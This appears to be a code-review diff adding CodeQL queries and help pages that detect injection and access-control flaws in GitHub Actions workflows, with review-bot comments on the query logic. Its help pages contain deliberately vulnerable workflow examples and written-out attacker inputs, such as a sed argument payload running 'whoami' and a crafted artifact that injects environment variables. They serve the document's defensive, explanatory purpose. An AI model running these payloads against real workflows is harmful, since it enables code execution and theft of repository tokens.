**Use unique identifiers when defining multi line environment variables**: + + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: + +```text +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. 
+ +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql new file mode 100644 index 000000000000..c9af38a2c507 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -0,0 +1,37 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envvar-injection/medium + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import EnvVarInjectionFlow::PathGraph + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +where + EnvVarInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) + ) +select sink.getNode(), source, sink, + "Potential environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() 
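Review bot: Same `@name` typo as the critical variant: `Enviroment Variable built from user-controlled sources` should read `@name Environment variable built from user-controlled sources`, since this string is the alert title. The `// exclude paths to file read sinks from non-artifact sources` comment also overstates what the first disjunct does (it only tests the source type and constrains no sink); a comment such as `// text sources: any sink; artifact sources: only file-read or MaD sinks` would match the code as written.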
diff --git a/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql new file mode 100644 index 000000000000..7d45b25b1a29 --- /dev/null +++ b/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -0,0 +1,30 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/command-injection/critical + * @tags actions + * security + * experimental + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event +where + CommandInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) + ) +select sink.getNode(), source, sink, + "Potential command injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql new file mode 100644 index 000000000000..8e7d72dded93 --- /dev/null +++ b/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql 
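Review bot: `event` is bound only by `inPrivilegedContext(sink.getNode().asExpr(), event)` and is never related to `source`, so on a workflow with more than one trigger the alert can report an event the tainted value does not originate from, and the `ControlCheck` exclusion is evaluated against that possibly unrelated event. `CodeInjectionCritical.ql` in this same change adds `source.getNode().(RemoteFlowSource).getEventName() = event.getName()`; the same conjunct belongs here. This is inferred from the query text — if `CommandInjectionFlow` already restricts sources per event, a comment saying so would be enough.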
@@ -0,0 +1,26 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/command-injection/medium + * @tags actions + * security + * experimental + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph + +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +where + CommandInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md new file mode 100644 index 000000000000..92e480e4a7ae --- /dev/null +++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md 
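Review bot: The `select` casts the sink with `sink.getNode().asExpr().(Expression).getRawExpression()`; in QL a failing cast makes the whole row vanish, so if `CommandInjectionQuery` ever defines a sink whose node is not an `Expression` (the env-var queries in this change handle file-read sinks, for instance) the alert is dropped silently rather than reported with a weaker description. The env-var queries sidestep this with `sink.getNode().toString()`; either use that here or add a comment stating that every `CommandInjectionFlow` sink is an `Expression`. Whether such non-`Expression` sinks exist is not visible in this hunk.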
@@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR/g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql new file mode 100644 index 000000000000..6930e2f684a4 --- /dev/null +++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql 
@@ -0,0 +1,29 @@
+/**
+ * @name Argument injection
+ * @description Passing unsanitized user input to a command that will run it as a subprocess.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision very-high
+ * @id actions/argument-injection/critical
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-088
+ */
+
+import actions
+import codeql.actions.security.ArgumentInjectionQuery
+import ArgumentInjectionFlow::PathGraph
+import codeql.actions.security.ControlChecks
+
+from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink, Event event
+where
+ ArgumentInjectionFlow::flowPath(source, sink) and
+ inPrivilegedContext(sink.getNode().asExpr(), event) and
+ not exists(ControlCheck check |
+ check.protects(sink.getNode().asExpr(), event, "argument-injection")
+ )
+select sink.getNode(), source, sink,
+ "Potential argument injection in $@ command, which may be controlled by an external user ($@).",
+ sink, sink.getNode().(ArgumentInjectionSink).getCommand(), event, event.getName()
diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md
new file mode 100644
index 000000000000..4957297be92a
--- /dev/null
+++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md
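Review bot: The `ControlCheck` exclusion only honours checks labelled `"argument-injection"`, whereas `CommandInjectionCritical.ql` in this change accepts `["command-injection", "code-injection"]` even though both weaknesses end in the same shell execution; if a label or permission check that gates `run:` steps is registered under `code-injection`, this query will still report the step. Consider `check.protects(sink.getNode().asExpr(), event, ["argument-injection", "command-injection", "code-injection"])`, or add a comment explaining why argument injection is deliberately treated differently. As in the other critical queries, `source` is never tied to `event`, so `source.getNode().(RemoteFlowSource).getEventName() = event.getName()` would avoid reporting an unrelated trigger in the message.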
@@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql new file mode 100644 index 000000000000..37acbc051229 --- /dev/null +++ b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql 
@@ -0,0 +1,25 @@
+/**
+ * @name Argument injection
+ * @description Passing unsanitized user input to a command that will run it as a subprocess.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision medium
+ * @id actions/argument-injection/medium
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-088
+ */
+
+import actions
+import codeql.actions.security.ArgumentInjectionQuery
+import ArgumentInjectionFlow::PathGraph
+
+from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink
+where
+ ArgumentInjectionFlow::flowPath(source, sink) and
+ inNonPrivilegedContext(sink.getNode().asExpr())
+select sink.getNode(), source, sink,
+ "Potential argument injection in $@ command, which may be controlled by an external user.", sink,
+ sink.getNode().(ArgumentInjectionSink).getCommand()
diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionCritical.md
new file mode 100644
index 000000000000..f2e494468112
--- /dev/null
+++ b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.md
@@ -0,0 +1,82 @@ +# Code Injection in GitHub Actions + +## Description + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. + +## Recommendations + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets attackers inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +### Correct Usage + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +The following example uses `process.env` to read environment variables within JavaScript code. 
+ +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql new file mode 100644 index 000000000000..c4ab00837ca7 --- /dev/null +++ b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
@@ -0,0 +1,36 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/code-injection/critical + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event event +where + CodeInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + source.getNode().(RemoteFlowSource).getEventName() = event.getName() and + not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) + ) +select sink.getNode(), source, sink, + "Potential code injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md new file mode 100644 index 000000000000..f2e494468112 --- /dev/null +++ b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md 
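Review bot: The github-script exclusion drops the alert whenever `getAToJsonReferenceExpression(...)` yields anything for the expression, i.e. as soon as some `toJSON(...)` appears in it, without checking that the tainted reference is the one wrapped in `toJSON`; an expression that also interpolates an unwrapped context next to a `toJSON` call would be excluded. If the helper already guarantees that the match covers the whole expression, a comment saying so is needed, because the rationale is not stated anywhere in the hunk. Suggested comment above the `not exists(UsesStep script | ...)`: `// toJSON() yields a JSON literal, which cannot terminate the surrounding JS expression; only safe when the tainted reference itself is the toJSON argument`.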
@@ -0,0 +1,82 @@ +# Code Injection in GitHub Actions + +## Description + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. + +## Recommendations + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets attackers inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +### Correct Usage + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +The following example uses `process.env` to read environment variables within JavaScript code. 
+ +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql new file mode 100644 index 000000000000..0f8b6e13a290 --- /dev/null +++ b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql 
@@ -0,0 +1,33 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/code-injection/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +where + CodeInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) + ) +select sink.getNode(), source, sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md new file mode 100644 index 000000000000..91360a30ed88 --- /dev/null +++ b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md 
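Review bot: The github-script `toJSON` exclusion is duplicated verbatim from `CodeInjectionCritical.ql`, so any later refinement (for example checking that the tainted reference itself is the `toJSON` argument) has to be made twice and the two queries can drift apart. Move it into `codeql.actions.security.CodeInjectionQuery` as a predicate such as `isToJsonGithubScriptSink(DataFlow::Node sink)` and call it from both queries. The exclusion also carries no comment explaining why a `toJSON` result is considered safe inside a JS `script:` block; the predicate's QLDoc is the natural place for that.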
@@ -0,0 +1,13 @@ +# Use of Actions with known vulnerabilities + +## Description + +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize GitHub Actions with known vulnerabilities. + +## Recommendations + +Either remove the component from the workflow or upgrade it to a version that is not vulnerable. + +## References + +- [GitHub Docs: Keeping your actions up to date with Dependabot](https://docs.github.com/en/code-security/dependabot/working-with-dependabot/keeping-your-actions-up-to-date-with-dependabot) diff --git a/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql new file mode 100644 index 000000000000..497a3b9feb9b --- /dev/null +++ b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -0,0 +1,20 @@ +/** + * @name Use of a known vulnerable action. + * @description The workflow is using an action with known vulnerabilities. + * @kind problem + * @problem.severity error + * @security-severity 7.5 + * @precision high + * @id actions/vulnerable-action + * @tags actions + * security + * external/cwe/cwe-1395 + */ + +import actions +import codeql.actions.security.UseOfKnownVulnerableActionQuery + +from KnownVulnerableAction step +select step, + "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, + step.getVersion(), step, step.getCallee(), step, step.getFixedVersion() diff --git a/actions/ql/src/Security/CWE-200/SecretExfiltration.ql b/actions/ql/src/Security/CWE-200/SecretExfiltration.ql new file mode 100644 index 000000000000..2e583a989893 --- /dev/null +++ b/actions/ql/src/Security/CWE-200/SecretExfiltration.ql 
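Review bot: `@name Use of a known vulnerable action.` ends with a period, unlike every other `@name` in this change; the name is used as the alert title, so drop the period. The message `Update it to $@` also lacks terminating punctuation while the other messages in this pack end with one; `"The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@."` would be consistent. All three `$@` placeholders link to the same `step`, which is fine, but a one-line comment such as `// all three links point at the uses: step; there is no separate element for the action itself` would stop a reader from assuming the middle one targets the action.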
@@ -0,0 +1,23 @@
+/**
+ * @name Secret exfiltration
+ * @description Secrets may be exfiltrated by an attacker who can control the data sent to an external service.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/secret-exfiltration
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-200
+ */
+
+import actions
+import codeql.actions.security.SecretExfiltrationQuery
+import SecretExfiltrationFlow::PathGraph
+
+from SecretExfiltrationFlow::PathNode source, SecretExfiltrationFlow::PathNode sink
+where SecretExfiltrationFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/actions/ql/src/Security/CWE-275/MissingActionsPermissions.md
new file mode 100644
index 000000000000..9385759dae95
--- /dev/null
+++ b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.md
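Review bot: The alert message contains a doubled word: `which may be be leaked to an attacker-controlled resource.` should be `which may be leaked to an attacker-controlled resource.`. Separately, this is the only flow query in the change with no `inPrivilegedContext`/`inNonPrivilegedContext` split; a non-privileged job (for example a `pull_request` run from a fork) does not receive repository secrets, so the path is only exploitable in a privileged context, and gating on `inPrivilegedContext(sink.getNode().asExpr(), _)` would bring the query in line with the others and cut noise. Whether `SecretExfiltrationQuery` already restricts its sources or sinks that way is not visible in this hunk.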
@@ -0,0 +1,30 @@ +# Actions Job and Workflow Permissions are not set + +## Description + +If a GitHub Actions job or workflow has no explicit permissions set, then the repository permissions are used. Repositories created under organizations inherit the organization permissions. The organizations or repositories created before February 2023 have the default permissions set to read-write. Often these permissions do not adhere to the principle of least privilege and can be reduced to read-only, leaving the `write` permission only to a specific types as `issues: write` or `pull-requests: write`. + +## Recommendations + +Add the `permissions` key to the job or the root of workflow (in this case it is applied to all jobs in the workflow that do not have their own `permissions` key) and assign the least privileges required to complete the task: + +```yaml +name: "My workflow" +permissions: + contents: read + pull-requests: write +``` + +or + +```yaml +jobs: + my-job: + permissions: + contents: read + pull-requests: write +``` + +## References + +- [Assigning permissions to jobs](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/assigning-permissions-to-jobs) diff --git a/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql new file mode 100644 index 000000000000..d2969b7d6e72 --- /dev/null +++ b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql 
@@ -0,0 +1,25 @@ +/** + * @name Workflow does not contain permissions + * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. + * @kind problem + * @security-severity 5.0 + * @problem.severity recommendation + * @precision high + * @id actions/missing-workflow-permissions + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from Job job +where + not exists(job.getPermissions()) and + not exists(job.getEnclosingWorkflow().getPermissions()) and + // exists a trigger event that is not a workflow_call + exists(Event e | + e = job.getATriggerEvent() and + not e.getName() = "workflow_call" + ) +select job, "Actions Job or Workflow does not set permissions" diff --git a/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql new file mode 100644 index 000000000000..9610302d1c2a --- /dev/null +++ b/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -0,0 +1,19 @@ +/** + * @name Pull Request code execution on self-hosted runner + * @description Running untrusted code on a public repository's self-hosted runner can lead to the compromise of the runner machine + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/pr-on-self-hosted-runner + * @tags actions + * security + * experimental + * external/cwe/cwe-284 + */ + +import codeql.actions.security.SelfHostedQuery + +from Job job +where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) +select job, "Job runs on self-hosted runner" diff --git a/actions/ql/src/Security/CWE-285/ImproperAccessControl.md b/actions/ql/src/Security/CWE-285/ImproperAccessControl.md new file mode 100644 index 000000000000..594f381d8ce0 --- /dev/null +++ b/actions/ql/src/Security/CWE-285/ImproperAccessControl.md 
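Review bot: The `@description` is ungrammatical: `Workflows should contain permissions to provide a clear understanding has permissions to run the workflow.` Suggest `@description Workflows should set an explicit permissions block so that the privileges granted to the GITHUB_TOKEN are clear and minimal.` The query lives under `Security/CWE-275` and carries `@security-severity 5.0`, yet is tagged `maintainability` rather than `security`; if it is meant to run with the security suite the tag should be `security`, otherwise the `@security-severity` line is misleading. Whether `Job` here also covers jobs that only `uses:` a reusable workflow, which inherit the caller's permissions, is not visible in this hunk and deserves a comment next to the `workflow_call` exclusion.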
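Review bot: The `@name` and `@description` promise "Pull Request code execution on a public repository's self-hosted runner", but the `where` clause only tests `staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job)` and the message says merely `Job runs on self-hosted runner`; unless those predicates already restrict to pull-request-triggered jobs on public repositories (not visible here), the query flags every self-hosted job and the metadata overclaims. Either add the trigger condition in the query or make the message state what is actually checked, e.g. `"Job runs on a self-hosted runner; untrusted pull request code would execute on it."`. This query also omits `import actions` while every other query in the change has it; if `Job` arrives transitively through `SelfHostedQuery` that works, but an explicit import (or a comment) would make the dependency clear.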
@@ -0,0 +1,60 @@ +# Improper Access Control + +## Description + +Sometimes labels are used to approve GitHub Actions. An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed and approved by label. + +## Recommendations + +When using labels, make sure that the code cannot be modified after it has been reviewed and the label has been set. + +## Examples + +### Incorrect Usage + +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. There are two problems with the code: + +1. The workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. The workflow will be triggered every time a new change is added to the Pull Request. +2. The workflow uses `ref: ${{ github.event.pull_request.head.ref }}` for checkout, which is a branch name of the Pull Request. There is a window of opportunity for the attacker to modify their branch after the Pull Request is labeled, but before the workflow starts and runs the checkout. + +```yaml +on: + pull_request_target: + types: [opened, synchronize] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage + +Make sure that the workflow only gets triggered when the label is set and use an immutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. 
+ +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha}} + - run: ./cmd +``` + +## References + +- [Events that trigger workflows](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target) diff --git a/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql b/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql new file mode 100644 index 000000000000..ba002f16a874 --- /dev/null +++ b/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -0,0 +1,30 @@ +/** + * @name Improper Access Control + * @description The access control mechanism is not properly implemented, allowing untrusted code to be executed in a privileged context. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/improper-access-control + * @tags actions + * security + * external/cwe/cwe-285 + */ + +import 